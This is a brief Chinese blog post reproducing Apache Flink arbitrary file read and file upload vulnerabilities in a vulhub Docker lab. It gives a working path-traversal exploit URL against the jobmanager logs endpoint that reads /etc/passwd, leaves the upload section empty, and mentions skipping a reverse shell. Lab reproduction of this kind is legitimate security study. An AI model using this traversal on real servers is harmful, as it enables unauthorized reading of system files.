apache flink任意文件读取&文件上传漏洞复现
vvulhub搭建
docker-compose up -d
访问8081端口,进入控制面板
任意文件读取exp
http:/x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
文件上传
------------------
本来还想试一下反弹shell,但是因为docker环境部署在了公网ip上,反弹shell比较麻烦,就不再试了
浙公网安备 33010602011771号